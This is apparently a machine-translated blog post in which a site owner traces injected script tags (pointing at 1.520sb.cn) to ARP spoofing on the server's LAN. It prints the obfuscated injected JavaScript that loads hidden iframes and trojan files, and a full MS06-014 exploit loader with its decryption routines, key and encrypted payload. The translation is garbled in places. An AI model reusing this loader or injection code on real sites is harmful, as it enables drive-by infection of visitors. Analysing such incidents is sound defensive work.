At this point check the source code can be found at the top of the page was added a sentence <script src=http://1.520sb.cn/1.js></script>
But this code doesn't always appear.
I thought the server was attacked or the virus was in the server.
Checked all pages and related files that have occurred
No Exceptions found
The server didn't find any intrusion marks either.
Download this JS file to the local, open after the discovery is the following code
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\ X2e\x63\x6e\/\x6d\x61\/\x31\x2e\x6a\x70\x67\ ' \x29\ "\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x44\x49\x56 \x73\x74\x79\x6c\ x65\x3d\ "\x43\x55\x52\x53\x4f\x52\x3a \x75\x72\x6c\x28\ ' \x68\x74\x74\x70\x3a\/\/\x31\x2e\x35\x32\x30\x73\x62\ X2e\x63\x6e\/\x6d\x61\/\x32\x2e\x6a\x70\x67\ ' \x29\ "\x3e\x3c\/\x44\x49\x56\x3e\x3c\/\x44\x49\x56\x3e");
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74" ["\x77\x72\x69\x74\x65\x6c\x6e"] ("\x3c\x69\x66\x72\x61\x6d\x65 \x73\ X72\X63\X3D\X68\X74\X74\X70\X3A\/\/\X31\X2E\X35\X32\X30\X73\X62\X2E\X63\X6E\/\X74\X6A\X2E\X68\X74\X6D \x77\x69\ x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72\x61\x6d\x65\x3e ")
16-in-system conversion, because the JavaScript runtime automatically transcoding, this code is embedded and open the Web page is automatically run.
We use the document.write statement to print this code to the page, and the converted code is
window["Document" ["Writeln"] ("<div style=" Cursor:url (' yun_qi_img/1.jpg ') ">"); window["Document"] ["Writeln "] (" <div style= "Cursor:url (' yun_qi_img/2.jpg ')" ></DIV></DIV> "); window[" Document "[" Writeln "] ( "<iframe src=http://1.520sb.cn/tj.htm width=0 height=0></iframe>")
Http://1.520sb.cn/ma/1.jpg and http://1.520sb.cn/ma/2.jpg are two Trojan files, specifically not checked, http://1.520sb.cn/ Tj.htm contains statistics and a MS06014 exploit script http://1.520sb.cn/mm/06014.htm
The content of http://1.520sb.cn/mm/06014.htm is
<script language =javascript>
function Utf8to16 (str) {var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while (I<len) {c=str.charcodeat (i++); switch (c>>4)
{Case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charat (i-1); Break;case 12:case 13:char2= Str.charcodeat (i++); Out[out.length]=string.fromcharcode ((c&0x1f) <<6) | ( char2&0x3f)); Break;case 14:char2=str.charcodeat (i++); Char3=str.charcodeat (i++); out[out.length]= String.fromCharCode ((c&0x0f) <<12) | ( (char2&0x3f) <<6) | ((char3&0x3f) <<0)); Break;}}
Return Out.join (");}
var base64decodechars=new Array ( -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1 , -1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,- 1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,- 1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);
function Base64decode (str)
{var C1,c2,c3,c4;var i,len,out;len=str.length;i=0;out = ""; while (I<len)
{Do
{c1=base64decodechars[str.charcodeat (i++) &0xff]}while (i<len&&c1==-1); if (c1==-1)
Break;do
{c2=base64decodechars[str.charcodeat (i++) &0xff]}while (i<len&&c2==-1); if (c2==-1)
Break;out+=string.fromcharcode ((c1<<2) | ( (c2&0x30) >>4));d o
{c3=str.charcodeat (i++) &0xff;if (c3==61)
Return Out;c3=base64decodechars[c3]}while (I<len&&c3==-1); if (c3==-1)
Break;out+=string.fromcharcode ((c2&0xf) <<4) | ( (c3&0x3c) >>2));d o
{c4=str.charcodeat (i++) &0xff;if (c4==61)
Return Out;c4=base64decodechars[c4]}while (I<len&&c4==-1); if (c4==-1)
Break;out+=string.fromcharcode (((c3&0x03) <<6) |c4)}
Return out}
function Long2str (v,w) {var vl=v.length;var sl=v[vl-1]&0xffffffff;for (var i=0;i<vl;i++)
{V[i]=string.fromcharcode (v[i]&0xff,v[i]>>>8&0xff,v[i]>>>16&0xff,v[i]>> >24&0XFF);}
if (w) {return V.join ("). substring (0,SL);}
Else{return V.join (');}
function Str2long (s,w) {var len=s.length;var v=[];for (var i=0;i<len;i+=4)
{v[i>>2]=s.charcodeat (i) |s.charcodeat (i+1) <<8|s.charcodeat (i+2) <<16|s.charcodeat (i+3) < <24;}
if (w) {V[v.length]=len;}
return v;}
function Xxtea_decrypt (Str,key) {if (str== "") {return "";}
var v=str2long (str,false); var k=str2long (key,false); var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9e3779b9;var Mx,e Q=math.floor (6+52/(n+1)), Sum=q*delta&0xffffffff;while (sum!=0) {e=sum>>>2&3;for (var p=n;p>0; p--) {z=v[p-1];mx= (z>>>5^y<<2) + (y>>>3^z<<4) ^ (sum^y) + (k[p&3^e]^z); y=v[p]=v[p]- MX&0XFFFFFFFF;}
z=v[n];mx= (z>>>5^y<<2) + (y>>>3^z<<4) ^ (sum^y) + (k[p&3^e]^z);y=v[0]=v[0]-mx& 0XFFFFFFFF;SUM=SUM-DELTA&0XFFFFFFFF;}
Return Long2str (v,true);}
T= "wxvgrqsvcfufj2q0uffattocaf7jqxbkzv5bkcf0dq/y74mvvpn26a0t/ivhny4yh4ryyiac/vds3fyve81yhk1bjvx1apl4nhpl/ rnned15lbz+ymhdixfcqnlw5tl5fe/bm63gedjh7hk3lks0phvie1b12g3fdnkwc2+mgnulhuxa4+iyle+ns68c7h4ynayz++0kv/ Pj5jtzwlqb9vurmblzgtr1kvs6lwzbz5t7lqiwemc75crmenbaon4kcbnpioi78chxvuquicbosdbj5kcbldnsuh6xsuzsgjfbefwemap4ipqyh /9xhlz7r18whnfb2sdry116kkzowlwv9jaqrx5megpdqtxgbwkr9mcdmzwxdej+vyhbnt9c/wnrah7gq/ 1ffvbasmwimyteb0cj7ba9uqccvguxb9xrrkjmd/qx6jgmuhashgxcr3t9jlk+tdlolnuvgw8dfnnv0orm403xi52orstdotkj+h+ jxujwc8glz5nsy4av4fokst567oab45ksk9fcrwgkv3vohisdrssfaiveugj+ 4mgz5k9jdlhvmxaitumnbe5pzxiapexetz0pliqk80xfipcb5qy/cdhsehb5l0ctl2jdsavlc9ve02hdiai7isaahlbgmtbh2s7tnhqh/ ifhzpf898hpkbdm5nf2siuuirytdlxb7kzhjruyrwu+ew715ryhscqqhew9jztcxsh25mpbqkw/2qbusz6dil36ljcly8l/aro7aqyisfeoa8h /0+85zac5o2pw6dbwysnrjdcoamnlctwjncvkbaol7b7kwkwascw3l+17fogiku9l+qs1z1bmbdzqdsk98fnwovi/lq9jkew8tp6bqzzy6un+ 4ozgxanpquyzrq2cqajxrxlxzabdj9bq1n/2edvkjyfgsrfqwafe4owxs7a11webe9kur3/p5lp3g/e4opt0qvjut+nlf3rcuf9eew+3l/ Opr8kvzbouokv5bhwxiwlkf/hhhk3yegmpao6ujlfkmlrohoznyai1/odngziqc61fe2m/ Kbdowuwx8tnmh16wb5uf3g2nz3m6ma13kjequs9hthzgrimk5ysxhs5e0ludet04hstxz81rvhkivtit ";
T=utf8to16 (Xxtea_decrypt (Base64decode (t), ' Fuckjapan '));
document.write (t);
</script>
Records of an entry.
Because the server settings have not been detected and the signs of intrusion, the internet search for a 520SB, see someone said: And you said none of this is a kind of arpsniffer, the packet is sent out to the gateway in the process of being hijacked mainly because the intranet has a computer is controlled, By ARP spoofing in some key words Riga. Even a simple HTML page will be added. Because of the instability of ARP technology, so the success rate of hijacking is not the same.
Oh. The customer has met once, the last reason is this, reload system is useless, find that computer is the key
Http://www.im286.com/archiver/tid-1886972.html
Http://linux.chinaunix.net/bbs/thread-886420-4-1.html
So that's the problem with the server LAN.
Think million network has to provide a software binding gateway IP and MAC address used to prevent ARP spoofing small software, hurriedly downloaded after running, prompt binding success,
Refresh the Web site, but found that the injected virus code still exists.
Call million nets, get really is ARP cheat affirmative answer, should check the host of the problem to the next Monday, prompted me to download their Mac binding tool, is my original run that small software, let me restart after observation.
So far, the problem seems to have been resolved, record the above.
Because this blog on the same server, please visit this week's friends in time to upgrade anti-virus software, and do a good job of anti-virus, such as caused any loss, I can only deeply apologize.
ps:520sb.cn Domain name Everyone is a Pant of SB, look at this domain name will know.
